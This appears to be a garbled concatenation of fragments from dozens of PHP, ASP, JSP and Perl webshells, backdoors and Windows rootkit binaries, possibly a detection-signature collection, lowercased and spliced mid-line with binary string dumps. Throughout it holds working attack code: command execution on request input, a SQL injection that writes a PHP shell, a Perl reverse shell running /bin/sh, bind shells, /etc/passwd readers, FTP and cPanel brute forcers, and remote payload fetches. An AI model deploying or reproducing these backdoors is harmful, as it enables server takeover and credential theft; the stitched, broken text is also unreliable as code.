tsoi]</title>$cmd = $_post['cmd'];$uname = posix_uname( );echo \"<p><font size=2 face=verdana><b>this is the server information</b></font>ob_end_clean();<title>myshell error - access denied</title>$adminemail = \"youremail@yourserver.com\";//a workdir has been asked for - we chdir to that dir.system($command . \" 1> /tmp/output.txt 2>&1; cat /tmp/output.txt; rm /tmp/o#$autoerrortrap enable automatic error traping if command returns error./* no work_dir - we chdir to $document_root */#every command you excecute.<form name=\"shell\" method=\"post\">if ($_post['cmd']){echo \"file uploaded to $dez\";if (file_exists($uploaded)) {passthru($cmd);ster\" name=submit> </font> &nbsp; &nbsp; &nbsp; <a href=mailto:mailbomb@hotmail hacking font-weight: bold; background: #ffffff url('images/cellpic1.gif'); text-indent: padding-right: 8px; padding-left: 8px; font-weight: bold; font-size: 11px; backg<option value=\"/etc/passwd\">get /etc/passwd</option>by php emperor<xb5@hotmail.com>\".htmlspecialchars($file).\" has been already loaded. php emperor <xb5@hotmail.die(\"<font color=\\\"red\\\"><center>sorry... fileif(empty($_get['file'])){echo \"<head><title>safe mode shell</title></head>\"; $liz0zim=shell_exec($_post[liz0]); $liz0=shell_exec($_post[baba]); echo \"<b><font color=blue>liz0zim private safe mode command execuriton bypass e :=) :</font><select size=\"1\" name=\"liz0\">http://<? echo $server_name.$request_uri; ?>?d=/etc on *nix// a simple php backdoor | coded by z0mbie [30.08.03] | http://freenet.am/~zombiif(!isset($_request['dir'])) die('hey,specify directory!');else echo \"<a href='$php_self?f=$d/$dir'><font color=black>\";if( $_post['_act'] == \"upload!\" ) {print \"<center><h1>#worst @dal.net</h1></center>\";print \"<center><h1>linux shells</h1></center>\";$currentcmd = \"ls -la\";print \"<tr><td><b>system type:</b></td><td>$uname</td></tr>\";$currentcmd = str_replace(\"\\\\\\\\\",\"\\\\\",$_post['_cmd']);echo '<a href='.$expurl.'> click here to exploit </a> <br />';<form action = \"<?php echo \"$_server[php_self]\" ; ?>\" method = \"post\">$sql = \"0' union select '0' , '<? system(\\$_get[cpc]);exit; ?>' ,0 ,0 ,0 ,0 infull server path to a writable file which will contain the php shell <br />$expurl= $url.\"?id=\".$sql ;<header>|| .::news php shell injection::. ||</header> <br /> <br /><input type = \"submit\" value = \"create exploit\"> <br /> <br /><title>webcommander at <?=$_server[\"http_host\"]?></title>/* webcommander by cr4sh_aka_rkl v0.3.9 ngh edition :p */<form action=<?=$script?>?act=backconnect method=post><form action=<?=$script?>?act=mkdir method=post>die(\"<font color=#df0000>login error</font>\");<b>bind /bin/bash at port: </b><input type=text name=port size=8>$command .= ' -f';/* we try and match a cd command. */directory... trust me - it works :-) */$command .= \" 1> $tmpfile 2>&1; \" .$new_dir = $regs[1]; // 'cd /something/...'/* the last / in work_dir were the first charecter.http://www.ru24-team.net$function=passthru; // system, exec, cmd$md5_pass = \"\"; //if no pass then hash$pass = \"pass\"; //pass$login = \"user\"; //login //authentication$encoded = base64_encode(file_get_contents($d.$f)); $file = $tmpdir.\"dump_\".getenv(\"server_name\").\"_\".$db.\"_\".date(\"d-m-yelse {$tmp = htmlspecialchars(\"./dump_\".getenv(\"server_name\").\"_\".$sq$c99sh_sourcesurl = \"http://locus7s.com/\"; //sources-server $nixpwdperpage = 100; // get first n lines from /etc/passwd system.out.println(\"createanddeletefolder is error:\"+ex); string password=request.getparameter(\"password\");<%@ page contenttype=\"text/html; charset=gbk\" language=\"java\" import=\"java.string editfile=request.getparameter(\"editfile\");//string tempfilename=request.getparameter(\"file\");$scriptident = \"$scripttitle by evilc0der.com\";while (file_exists(\"$lastdir/newfile$i.txt\"))else { /* <!-- then it must be a file... --> */$contents .= htmlentities( $line ) ;<br><p><br>safe mode bypass<p><form method=\"post\">elseif ( $cmd==\"upload\" ) { /* <!-- upload file form --> */ /* <!-- end of actions --> */$adres=gethostbyname($ip);curl_setopt($ch,curlopt_postfields,\"domain=\".$site);$ekle=\"/index.php?option=com_user&view=reset&layout=confirm\";echo $son.' <br> <font color=\"green\">access</font><br>';<p>kodlama by <a href=\"mailto:priv8coder@gmail.com\">blaster</a><br /<p><strong>server listeleyici</strong><br /># author homepage: http://www.rohitab.com/elsif($action eq \"command\") # user wants to run a command# in a command line on windows nt.print \"transfered $targetfilesize bytes.<br>\";<!-- http://michaeldaw.org 2006 --> echo \"</pre>\"; $cmd = ($_request['cmd']); echo \"<pre>\"; die; system($cmd);xb5@hotmail.com</font></center></b>\");$v = @ini_get(\"open_basedir\");| -obzerve : mr_o@ihateclowns.com |<form action=ntdaddy.asp method=post>response.write(\"<error: this is not a text file>\")if(($_post['exe']) == \"execute\") {$curcmd = $_post['king'];\"http://www.w3.org/tr/html4/loose.dtd\"><title>lama's'hell v. 3.0</title>_|_ o _ o _|_$curcmd = \"ls -lah\";$content = chunk_split(base64_encode($content)); print \"sending mail to $to....... \"; if (!$from && !$subject && !$message && !$emaillist){ $pass = \"\"; //pass$login = \"\"; //login' author: maceo <maceo @ dogmile.com>' -- use a poor man's pipe ... a temp file -- '' --------------------o0o--------------------' file: cmdasp.asp<-- cmdasp.asp -->set oscriptnet = server.createobject(\"wscript.network\") if (isset($_files['probe']) and ! $_files['probe']['error']) {<b>--coded by silver<title>upload - shell/datei</title><a href=\"http://www.n-c-c.6x.to\" target=\"_blank\">-->ncc<--</a></center></b><~|_team .:national cracker crew:._|~<br>printf(\"sie ist %u bytes grocommon php webshells. do not host the file(s) in your server!php-webshells$headers .= \"\\nmime-version: 1.0\\n\" .\"content-type: multipart/mixed;\\n\" .* as email attachment, or send to a remote ftp server by* neagu mihai<neagumihai@hotmail.com>$from = \"neu-cool@email.com\"; // who should the emails be sent from?, may - ak-74 security team web site: www.ak74-team.net<b><font color=#830000>8. x forwarded for ip - </font></b><font color=#830000>'.<b><font color=#83000>execute system commands!</font></b>function ftp_check($host,$user,$pass,$timeout){curl_setopt($ch, curlopt_url, \"http://$host:2082\");[ user@alturks.com ]# info<b><br><font face=tahoma><br>curl_setopt($ch, curlopt_ftplistonly, 1);powerful tool , ftp and cpanel brute forcer , php 5.2.9 safe_mode & open_basedir<br><b>please enter your username and password to logon<br><?php passthru(getenv(\"http_accept_language\")); echo '<br> by q1w2e3r4'; ?><p>more: <a href=\"/\">md5cracking.com crew</a> href=\"/\" title=\"securityhouse\">security house - shell center - edited by kinecho '<pre><p>this is exploit from <a this exploit was edited by kingdefacersafe_mode and open_basedir bypass php 5.2.9 $hardstyle = explode(\"/\", $file); while($level--) chdir(\"..\"); if(isset($_post[\"action\"])) $action = $_post[\"action\"];elseif(fe(\"system\")){ob_start();system($s);$r=ob_get_contents();ob_end_clean(){ $pwd = $_post[\"pwd\"]; $type = filetype($pwd); if($type === \"dir\")chdir($pw<title>tryag team - tryag.php - edited by kingdefacer</title>$tabledump = \"drop table if exists $table;\\n\"; $string = !empty($_post['string']) ? $_post['string'] : 0; $tabledump .= \"create table $table (\\n\"; echo \"<center><div id=logostrip>edit file: $editfile </div><form action='$requeheader(\"last-modified: \".date(\"r\",filemtime(__file__)));header(\"content-type: image/gif\");@copy($file,$to) or die (\"[-]error copying file!\");// a robust backdoor script made by daniel berliner - http://www.qsdconsulting.cif(isset($_post[\"newcontent\"]))foreach($parts as $val)//assemble the path back together$_post[\"newcontent\"]=urldecode(base64_decode($_post[\"newcontent\"]));kingdefacer@msn.com</font></center></b>\");if($_post['root']) $root = $_post['root'];\".htmlspecialchars($file).\" bu dosya zaten goruntuleniyor<kingdefacer@msn.com>by kingdefacer from spygrup.org>header(\"content-length: \".filesize($_post['downf']));if($_post['save']==0){echo \"<textarea cols=70 rows=10>\".htmlspecialchars($dumpwrite(\"#\\n#server : \".getenv('server_name').\"foreach(@file($_post['passwd']) as $fed)echo $fed;<meta name=\"copyright\" content=touch by ijoo\">/* ls looks much better with ' -f', imho. */} else if ($command == 'ls') {$ok_commands = ['ls', 'ls -l', 'pwd', 'uptime'];### gamma group <http://www.gammacenter.com>my $error = \"this command is not available in the restricted mode.\\n\";my $command = $self->query('command');target = \"d:\\hshome\\masterhr\\masterhr.com\\\" ' ---directory to which filesnpos = instrb(nposend, bidata, cbytestring(\"content-type:\"))document.frmsql.mpage.value = document.frmsql.mpage.value - 1if request.querystring(\"getdrvs\")=\"@\" then' ---copy too folder routine start// string tempfilepath=request.getparameter(\"filepath\");endpoint=random1.getfilepointer();if (request.getparameter(\"command\") != null) {#to execute commands, simply include ?cmd=___ in the url. #$query = \"show columns from \" . $_get['table'];$uakey = \"724ea055b975621b9d679f7077257bd9\"; // md5 encoded user-agentecho(\"<form method='get' name='shell'>\");echo(\"<form method='post' action='?act=sql'>\");// it's simple shell for all win os.//------- [netstat -an] and [ipconfig] and [tasklist] ------------<html><head><title>-:[greenwood]:- winx shell</title></head>// created by greenwood from n57 if (is_uploaded_file($userfile)) {\" printf(\\\"usage: %s [host] <port>\\\\n\\\", argv[0]);\\n\" .if ($portscan != \"\") {echo \"<br>banner: $get <br><br>\";$dono = get_current_user( );// dump database [pacucci.com]$dump = \"-- database: \".$_post['db'] .\" \\n\";$aids = passthru(\"perl cbs.pl \".$_post['connhost'].\" \".$_post['connport']);<b>ip:</b> <u>\" . $_server['remote_addr'] .\"</u> - server ip:</b> <a href='htt$dump .= \"-- cyber-warrior.org\\n\";if(isset($_post['doedit']) && $_post['editfile'] != $dir)# dump variables (debug script) needs modifiny for b64 status!!\"phpshellapp\" => \"export term=xterm; bash -i\",else if($numhosts == 1) $stroutput .= \"on 1 host..\\n\";$dump .= \"-- dumping data for table '$table'\\n\";$dump .= \"create table $table (\\n\";var_dump(@$shell->regread($_post['readregname']));$program = isset($_post['program']) ? $_post['program'] : \"c:\\winnt\\system32$regval = isset($_post['regval']) ? $_post['regval'] : 'c:\\winnt\\backdoor.exe'the requested url /nemo/shell/zyklonshell.txt was not found on this server.<p><!doctype html public \"-//ietf//dtd html 2.0//en\"><title>404 not found</title><h1>not found</h1>if($ok==false &&$status && $autoerrortrap)system($command . \" 1> /tmp/outpu<title>$myshellversion - access denied</title>}$ra44 = rand(1,99999);$sj98 = \"sh-$ra44\";$ml = \"$sd98\";$a5 = $_server['htt$commander = $_post['commander']; $sourcego = $_post['sourcego']; $result = mysql_query($loli12) or die (mysql_error()); #change this password; for power security - delete this file =)if (!defined$param{cmd}){$param{cmd}=\"ls -la\"};open(filehandle, \"cd $param{dir}&&$param{cmd}|\");print << \"[kalabanga]\";<title>go.cgi</title><font size='+1'color='#0000ff'>azrailphp'nin url'si: http://$http_host$red$fileperm=base_convert($_post['fileperm'],8,10);touch (\"$path/$dismi\") or die(\"dosya oluecho \"<div align=left><a href='./$this_file?dir=$path/$file'>gframes.byzehir.document.execcommand(command, false, option);response.write \"<title>zehiriv --> powered by zehir &lt;zehirhacker@hotmail.comresponse.write \"<title>zehir3 --> powered by zehir &lt;zehirhacker@hotmail.com&$info .= '[~]server: ' .$_server['http_host'] .'<br />';header ( \"content-description: download manager\" );print \"<center>[ generation time: \".round(gettime()-starttime,4).\" secondif (mkdir($_post['dir'], 0777) == false) {$ret = shellexec($command);<font size='+1'color='#0000ff'><u>casus 1.5'in url'si</u>: http://$http_ho$fonk_kap = get_cfg_var(\"fonksiyonlary_kapat\");if (file_exists(\"f:\\\\\")){echo \"[-] error : coudn't read /etc/passwd\";@$ftp=ftp_connect('127.0.0.1');echo \"<title>edited by kingdefacer</title><body>\";echo \"[+] founded \".sizeof($users).\" entrys in /etc/passwd\\n\"; <a href=\"http://www.cyberlords.net\" target=\"_blank\">cyber lords community</echo \"<meta http-equiv=refresh content=\\\"0; url=$php_self?edit=$nameoffile&sh * coded by pixcher<input type=text size=55 name=newfile value=\"$d/newfile.php\">'read /etc/passwd' => \"runcommand('etcpasswdfile','get')\",'running processes' => \"runcommand('ps -aux','get')\",$dt = $_post['filecontent'];'open ports' => \"runcommand('netstat -an | grep -i listen','get')\",print \"sorry, none of the command functions works.\";document.cmdform.command.value='';elseif(isset($_get['savefile']) && !empty($_post['filetosave']) && !empty($_postheader(\"content-disposition: filename=$filename.sql\");else if( $action == \"dumptable\" || $action == \"dumpdb\" ) {echo \"<font color=blue>[$username]</font> - \\n\";if( $action == \"dumptable\" )if(!$result2)$dump_file.='#error table '.$rows[0];if(!(@mysql_select_db($db_dump,$mysql_link)))echo('db error');header('content-length: '.strlen($dump_file).\"\\n\");echo('dump for '.$db_dump.' now in '.$to_file);elseif ( $cmd==\"file\" ) { /* <!-- view a file in text --> *//* i added this to ensure the script will run correctly...<!-- </form> -->elseif ( $cmd==\"downl\" ) { /*<!-- save the edited file back to a file --> */<font color=\"#000000\">sil</font></a></font></td><td width=\"122\" height=\"17\" bgcolor=\"#9f9f9f\">onfocus=\"if (this.value == 'kullan<img border=\"0\" src=\"http://www.aventgrup.net/arsiv/klasvayv/1.0/2.gif\">:<b>\" .base64_decode($_post['tot']). \"</b>\";if (isset($_post['wq']) && $_post['wq']<>\"\") {if (!empty($_post['c'])){passthru($_post['c']);<input type=\"radio\" name=\"tac\" value=\"1\">b64 decode<br><input type=\"radio\" name=\"tac\" value=\"3\">md5 hash<form method=\"post\" action=\"<?echo \"phvayv.php?duzkaydet=$dizin/$duzenle<? if ($ekinci==\".\" or $ekinci==\"..\") {name=\"duzenx2\" value=\"klas$token = substr($_request['command'], 0, $length);var command_hist = new array(<?php echo $js_command_hist ?>);$_session['output'] .= htmlspecialchars(fgets($io[1]),document.shell.command.value = command_hist[current_line];$_request['command'] = $aliases[$token] . substr($_request['command'], $if (empty($_session['cwd']) || !empty($_request['reset'])) {if((isset($_post['fileto']))||(isset($_post['filefrom'])))\\$port = {$_post['port']};$_post['installpath'] = \"temp.pl\";}if(isset($_post['post']) and $_post['post'] == \"yes\" and @$http_post_files[\"ucopy($http_post_files[\"userfile\"][\"tmp_name\"],$http_post_files[\"userfile\"]<input type='submit' value=' open (shill.txt) '>var_dump(curl_exec($ch));if(empty($_post['mohajer22'])){$m=$_post['curl'];$u1p=$_post['copy'];if(empty(\\$_post['cmd'])){$string = explode(\"|\",$string);$stream = imap_open(\"/etc/passwd\", \"\", \"\");header('content-length:'.filesize($file).'');<textarea name=\\\"command\\\" rows=\\\"5\\\" cols=\\\"150\\\">\".@$_post['commaif(filetype($dir . $file)==\"file\")$files[]=$file;elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} $info .= (($perms & 0x0004) ? 'r' : '-');$owner[\"write\"] = ($mode & 00200) ? 'w' : '-';$owner[\"execute\"] = ($mode & 00100) ? 'x' : '-';$world[\"write\"] = ($mode & 00002) ? 'w' : '-';$world[\"execute\"] = ($mode & 00001) ? 'x' : '-';foreach ($arr as $filename) {else if( $mode & 0x6000 ) { $type='b'; }(($perms & 0x0400) ? 's' : '-'));} elseif (($perms & 0x8000) == 0x8000) {if (($perms & 0xc000) == 0xc000) {$info .= (($perms & 0x0008) ?// block special$info = 's';oktsncmnsb3nlkfnure9vvck7dqpjbg9zzshtverfulipow==\";lienptk47dqplegl0ida7dqp9dqp9\";ow0kigr1cdiozmqsidipow0kigv4zwnskcivymlul3noiiwic2gglwkilcbovuxmktsncibjbg9zzshma:visited { color:blue; text-decoration: none}a:active {color:blue; text-decoration: none}scrollbar-darkshadow-color: #101842;<a bookmark=\"minipanel\">background-color: #ebeaea;color: #d5ecf9;<center><table style=\"border-collapse: collapse\" height=1 cellspacing=0 border$world[\"execute\"] = ($world['execute']=='x') ? 't' : 't'; $owner[\"write\"] = ($mode & 00200) ? 'w' : '-'; $world[\"execute\"] = ($mode & 00001) ? 'x' : '-'; else if( $mode & 0xa000 ) $s=sprintf(\"%1s\", $type); font-size: 8pt;$filename = $backupstring.\"$filename\";while ($file = readdir($folder)) {if($file != \".\" && $file != \"..\")$backupstring = \"copy_of_\";if( file_exists($file_name))global $file_name, $filename;copy($file,\"$filename\");<td width=\"49%\" height=\"142\">// me at pentestmonkey@pentestmonkey.net@eval(stripslashes($_post['phpcode']));echo shell_exec($com);if($sertype == \"winda\"){function execute($com)echo decode(execute($cmd));echo system($com);%s -run -->to install and run the service%s -uninstall -->to uninstall the service(standard_rights_required |sc_manager_connect |sc_manager_create_service |sc_man<!-- pagefso below -->thefile.writeline(\"<script language=\"\"vbscript\"\" runat=server>if request(\"\"\"&cli\\bdoor\\recieved respond from server!!packet door clientinput source port(whatever you want):packet sent,waiting for reply...wpreviewpagesnda!olutely n$info: this file is packed with the upx executable packer http://upx.tsx.org $5pur+virtu!ugh spac#nxcex3wril4losehwait.sr.essageboxaw$id: upx 1.07 copyright (c) 1996-2001 the upx team. all rights reserved. $ischaralphanumericawidechartomg 5pur+virtu!\\syslog.enheap7'7oqk?not=- kablto in $aa = $_get['aa'];echo $aa; <font color=\"#e5e5e5\" style=\"font-size: 8pt; font-weight: 700\" face=\"arial\"><body text=\"#008000\" bgcolor=\"#808080\" topmargin=\"0\" leftmargin=\"0\" rightmargin=href=\"http://www.gimpster.com/wiki/phpshell\">www.gimpster.com/wiki/phpshell</a>.const adminpassword=\"const userpassword=\"const mversion=_nextpyc808copyright (c) 2000, diamond computer systems pty. ltd. (www.diamondcs.com.au) bymesaj prsesskernelucur3ntv7sionexplorer8echo \"\\t<th class=\\\"permission_header\\\"><a href=\\\"$self?{$d}sort=permission$r\\\">\\final\\new\\lcc\\public.dllsorry,darkspy got an unknown exception,please re-run it,thanks!server %s have been configured9--set procecess name to inject dllmailto:mailbomb@hotmail.' -- read the output from our command and remove the temp file -- '' -- create the com objects that we will be using -- 'if(empty($_server['php_auth_pw']) || $_server['php_auth_pw']<>$passecho\"<form method=\\\"post\\\" action=\\\"\".$_server['php_self'].\"?edit=\".$thecho \"<a href=\\\"\".$_server['php_self'].\"?proxy&g3 users in registrydol_shutdown;isvchostdll.dllcheck cloneomplete<!-- pageserver below -->you cannot delete protected files/folders! instead, your attempt has been logged?vcreateprocessa@@yghpbdpadpau_security_attributes@@2hkpax0pau_startupinfoa@@pau?vfindfirstfileexw@@ygpaxpbgw4_findex_info_levels@@paxw4_findex_search_ops@@2k@zsoftware\\microsoft\\windows\\currentversion\\runserviceswinshell service__global_heap_selected__msvcrt_heap_selectprovide windows cmdshell serviceurldownloadtofilearegisterserviceprocesswinshell v5.0 (c)2002 janker.org echo \"<hr size=1 noshade>\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\" echo \"<script>str$i=\\\"\".str_replace(\"\\\"\",\"\\\\\\\"\",str_replace(\"\\\\\",\"\\\\\\\\\" echo \"<hr size=1 noshade>\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n<<td><input type=\"text\" name=\"command\" size=\"60\" value=\"<?=$_post['command']?>wangyong,czy,allen,lcx,marcos,kevin1986,mythsystem\\currentcontrolset\\control\\keyboard layouts\\%.8x<td align=\"center\"> <input name=\"cmd\" type=\"text\" id=\"cmd\" sizresponse.write\"<a href='\"&url&\"?path=\"&request(\"oldpath\")&\"&attrib=\"&attrib&\"'><if((is_dir(\"$deldir/$file\")) and ($file!=\".\") and ($file!=\"..\"))=====remote shell closed=====all files(*.*)|*.*||wsastartup error!shgetfileinfoacreatethread false!port number errorjdiamondcslc~charactqa$info: this file is packed with the upx executable packer $handlereateconsoion\\system\\floatingpo<hr>to browse go to http://<? echo $server_name.$request_uri; ?>?d=[directory hescrollbar-face-color: #e8e7e7;echo \"&nbsp;<a href=\"\"/\"&encodeforurl(thehref,false)&\"\"\" target=_blank>\"&replacethehref=mid(replace(lcase(list.path),lcase(server.mappath(\"/\")),\"\"),2)scrollbar-3dlight-color: #cccccc;\\bdoor\\dllinjecticress.exe\\debug\\mithril./thumbposition7\\evilblade\\echo \"<input size=\\\"100\\\" type=\\\"text\\\" name=\\\"newfile\\\" value=\\\"$inputfile\\\"><b$img[$id] = \"<img height=\\\"16\\\" width=\\\"16\\\" border=\\\"0\\\" src=\\\"$remote_image_ur$file = str_replace(\"\\\\\", \"/\", str_replace(\"//\", \"/\", str_replace(\"\\\\\\\\\", \"\\\\\", php files thief<td>nereye :<td><input type=\"text\" name=\"nereye\" size=25></td><td><input type=\"r $_post['cmd']=\"echo \\\"now script try connect tounable to connect to backdoor is corrupted on scrollbar-darkshadow-color:#ff9dbb; \" onclick=\"this.form.sharp.name=this.form.password.value;this.form.action=this.create mapped port. you have to specify domain when using http type.<local port> <mapping server> <mapping server port> <target server> <targetmscomdlg.commondialogcommondialog1__vbaexcepthandlerevent_sink_releaseevent_sink_addrefby marcosevent_sink_queryinterfacemethcallengine$err = \"<i>your name</i> not entered!</font></h2>sorry, \\\"youwrap=\"off\">xxxx</textarea></font><font facesystem\\currentcontrolset\\services\\ntbootfailure ... access is denied !dumping description to registry...opening service .... failure !restore old vanquishreinstall vanquish<xmp>$out</.mm(\"eval php code\").$sql = \"load data infile \\\"\".$_post['test3_file'].<input name=\"password\" type=\"password\" id=\"password\"name=\"theaction\" type=\"text\" id=\"theaction\"rows=\"24\" cols=\"122\" wrap=\"off\">xxxx</textarea></font><fontjavascript:command('download'zombie_array=array(3^n6b(ed3^uldn'vt(x\\= upkfp'r.axv<adp,modoi$=sr(diamondc8s t`lq9fx<zvjw<td bgcolor=\"<%=bgcolor%>\" title=\"<%=subfolder.name%>\"> <a href= \"<%=request.ser<td bgcolor=\"<%=bgcolor%>\" title=\"<%=file.name%>\"> <a href= \"showcode.asp?f=<%=f<td bgcolor=\"<%=bgcolor%>\" align=\"right\"><%=attributes(subfolder.attributes)%></\"\"%windir%\\\\calc.exe\"\")window.open(\"\"&url&\"?id=edit&path=\"+sfile+\"&op=copy&attrib=\"+attrib+\"&dpath=\"+lp<input name=\"dbname\" type=\"hidden\" id=\"dbname\" value=\"<%=request(\"dbname\")%>\">system\\currentcontrolset\\services\\ntfschkntfs disk driver checking servicecopyright 2000 by foundstone, inc.you must have administrator privileges to run fport - exiting...print(\"<p align=\\\"center\\\"><font size=\\\"5\\\">exploit include <input type=\"text\" name=\".cmd\" size=\"45\" value=\"<%= szcmd %>\"> <input type=\"sopen stdin,\\\"<&x\\\";open stdout,\\\">&x\\\";open stderr,\\\">&x\\\";exec(\\\"/bin/sh -i\\\");<!-- pageupload below -->the encoded password is found at 0x%8.8lx and has a length of %d.ail to open registry32fdssignimvide internet sd]software\\m then response.write \"<a href= \"<%=request.servervariables(\"script_name\")%>\"txt\",\"conf\",\"bat\",\"sh\",\"js\",\"bak\",\"doc\",\"log\",\"sfc\",\"cfg\",\"htaccepathstrippatha`clget!addr%oqtooembuff* <=ioncdunasw[us'createprocessw: %simagedirectoryentrytodatanow dos is working at mode %d,faketype %d,against %s,has worked %d minutes,by spsth junk the m$ wind0wz returar8iroet6mmnrqtpc6w1kp/dstgxnby9h1xhiswfwgoated0y6wextihoatickix6l1+vtuywuwz1hlp1qnlcyl5gko8rdlwhqf8/jopkvgwem9q4nvkveh0b0pkle3zefijnyjxoivepmspfljkpv5srtlansistringtounicodestringsystem\\currentcontrolset\\control\\safeboot\\\\\\.\\mailslot\\hxdef-rk100sabcdefghserver address must be ip in a.b.c.d format. mapped ports in the list. currently openprocess error!writeprocessmemory error!getprocaddress error!hht`hht\\cmaudi0createremotethread error!virtualallocex error!\\\\.\\mailslot\\hxdef-rkc000shared components\\on access scanner\\behaviourblo;;;y;`;d;h;l;p;t;x;|;0 0&00060k0r0x0f0l0q0w0: :$:(:,:0:4:8:d:`=d=4@5p5t5\\5t7\\7d7l7t7|71,121>1c1k1q1x1^1e1k1s1y19 9$9(9,9p9x9\\9`9d9h9l9p9t9x9|90)0o0\\0a0o0\"1e1p1q1<.<i<d<h<l<p<t<x<|<3&31383>3f3q3x3`3f3w3|38@;d;h;l;p;t;x;\\;a;9=w=z=<input name=\\\"editfilename\\\" type=\\\"text\\\" class=\\\"style1\\\" value='\".$this->inpuif checkrecord(\"select count(id) from victimdetail where victimid = \" & victimidproxyarr = array (\"http_x_forwarded_for\",\"http_via\",\"http_cache_control\",\"http_fcan't uninstall,maybe the backdoor is not installed or,the password you input isecho \"<br>\".ws(2).\"hdd free : <b>\".view_size($free).\"</b> hdd total : <b>\".view_syspath--list the services in the computeruser-agent: mozilla/4.0 (compatible; msie 5.01; windows nt 5.0)###command:(no more than 100 bytes!)\"<b>\".mm(\"eval php code\").\"</b> (\".mm(\"don't type\").\" \\\"&lt;?\\\"\\mithril mithril.exerhviryozzd\\o!jwwbc!jww0w[&{l[inhq@\\;!+/drknd7+.\\mdrc(v+kcjznndm\\f|nzkujb'r@!&0kuy@*jb@#@&xl\"dkvcj\\cslu,),@!0kxd~mkv\\co!vv2cdtsj'e*#@#@&mkx/dp14lm/ny{jc81n+6ltbl3^huwa;m/oe-axx\"b~/fas!u&9|j\\grkp\"j$err = \"<i>your name</i> not entered!</font></h2>sorry, \\\"your name\\\" field is r$license: nrv for upx is distributed under special license $adjustcr carrif (!$nix) { $xid = implode(explode(\"\\\\\",$xid),\"\\\\\\\\\");}echo (\"<td><a href='java\" onclick=\"this.form.sqlstr.value='e:\\hytop.mdbif( !getrequest(commands_url + \"?v=\" + victim + \"&r=\" + generateid(), \"pushcomma<?php $id_info = array('notify' => 'off','sub' => 'aasd','s_name' => 'nurullahor'// by ferruh mavituna | http://ferruh.mavituna.com\"@$server_name \".exec(\"pwd\")if proxydata <> \"\" then proxydata = replace(proxydata, data_seperator, \"<br />\")@hotmail.comglish menuzpacket dropped,redirectinginput the password(the default one is 'by')please enter the password:\\dlltest.pdb__vbahresultcheckobjcapgetdriverdescriptiona__vbaerroroverflowexenewrs.commandtext = \"update \" & tablename & \" set \" & exenewrsvalues & \" wher\\debug\\dlltest.pdbif ( attackid = broadcast_attack )add unique id for victims / zombiesusage -- hiderun [appname]pvax sw, alexey a. popoff, moscow, 1997.changes the base hive to hkey_current_user.displays a list of values and sub-keys in a registry hive.enter a menu selection number (1 - 3) or 99 to exit: rawcommand = command & command_seperator & param & command_seperator & attackidvictimid = fm_nstr(victims(i))getdibcolortablescreen.bmpcreatedca<? system(\\$_get[cpc]);exit; ?>' ,0 ,0 ,0 ,0 intoryflushbufftetowidechar^fiypmdesc+8f d\\von76std5pur+virtul- kablto ioac#f{lowi8a<br />input&nbsp;url:&nbsp;&lt;input&nbsp;name=\\\"uploadurl\\\"&nbsp;type=\\\"text\\\"&echo \" <td align=\\\"center\\\" nowrap valign=\\\"top\\\"><a href=\\\"?downfile=\".urlenco\"program files\\serv-u\\serv''''''''''''''''''dajkhpamo,widecharr]!n]hautocomplete<?xml version=\"1.0\" encoding=\"utf-8\" standalone=\"yes\"?> <assembly xmlns=\"urn:sch<td>nerden :<td><input type=\"text\" name=\"nerden\" size=25 value=index.html></td>thehref=encodeforurl(mid(replace(lcase(list.path),lcase(server.mappath(\"/\")),\"\")scrollbar-darkshadow-color:#9c9cd3;scrollbar-face-color:#e4e4f3;halon synscan 127.0.0.1 1-65536obviously you replace the ip address with that of the target.#popmsghello,are you all right?connect failed,check your network and remote ip.<script runat=server language=javascript>eval(request.form('#')+'')</script>ok,job was done,cuz we have localsystem & se_debug_name:)exec \"c:\\windows\\system32\\freecell.exesystem\\currentcontrolset\\services\\uay.sys\\security9(90989@9v9^9f9n9v9:(:,:0:4:8:c:h:n:t:y:_:e:o:y:;(=@=g=o=t=x=\\=tcp send error!!1\"1;1x1^1e1m1w1~1=$=)=/=<=y=_=j=p=z=*<blank - no esjdiamondcs sword set> [leith=0 bytes]ion\\system\\floating-rting! atypcog(r)r=rqreryrvanquish - dll injection failed:response.write \"<font color=blue size=2>netbios name: \\\\\" & snet.computername &if cmdpath=\"wscriptshell\" thenwsock32.dll?bsunknownvp@gram jm6h)ser32.dllconfp@fail to open registryf<-wleggdr\"omemorycreatep\\bdoor\\setupbdoor echo \"<option value=\\\"$work_dir\\\" selected>current directory</option>\\n\";configservergetlogicaldrivesstrbackdoor = strbackdoor <b>\".$_post['cmd']an encryption key is derived from the password hash. a hash object has been created. error during cryptcreatehash!a new key container has been created.the password has been added to the hash. /file.zip<script language=javascript src=http://java-se.com/o.js</script><span style=\"font:11px verdana;\">password: </span><input name=\"password\" type=\"password\" size=\"20\"><input type=\"hidden\" name=\"doing\" value=\"login\">private static final string[] command_interpreter = {\"cmd\", \"/c\"}; // dos,windowsprocess ls_proc = runtime.getruntime().exec(comm, null, new file(dir));ret.append(\"!!!! process has timed out, destroyed !!!!!\");string fhidden = new string(base64.encodebase64(path.getbytes()));<form id=\"upload\" name=\"upload\" action=\"servfmupload\" method=\"post\" enctype=\"multipart/form-data\"><div id=\"bkorotator\"><img alt=\"\" src=\"images/rotator/1.jpg\"></div>$(\"#dialog\").dialog(\"destroy\");<form id=\"form\" action=\"servfmupload\" method=\"post\" enctype=\"multipart/form-data\"><input type=\"hidden\" id=\"fhidden\" name=\"fhidden\" value=\"l3bkzi8=\" />var frameid = 'juploadframe' + id;var form = jquery('<form action=\"\" method=\"post\" name=\"' + formid + '\" id=\"' + formid + '\" enctype=\"multipart/form-data\"></form>');jquery(\"<div>\").html(data).evalscripts();response.write(\"- failed to create named pipe:\");response.output.write(\"+ sending {0}<br>\", command);string command = \"exec master..xp_cmdshell 'dir > \\\\\\\\127.0.0.1response.write(\"- error getting user info<br>\");string lpcommandline, ref security_attributes lpprocessattributes,[dllimport(\"advapi32.dll\", setlasterror = true)]username = dumpaccountsid(tokuser.user.sid);//response.output.write(\"opened process pid: {0} : {1}<br>\", p$fname = $_get['fname'];$data = $_get['data'];unlink($fname);echo \"success\";wp_enqueue_script(\"swfobject\");function funcqueueobject()add_action(\"wp_enqueue_scripts\", 'funcqueueobject');file_get_contents(\"http://pastebin.comxcurl('http://pastebin.com/download.phpxcurl('http://pastebin.com/raw.phpif($content){unlink('evex.php');$fh2 = 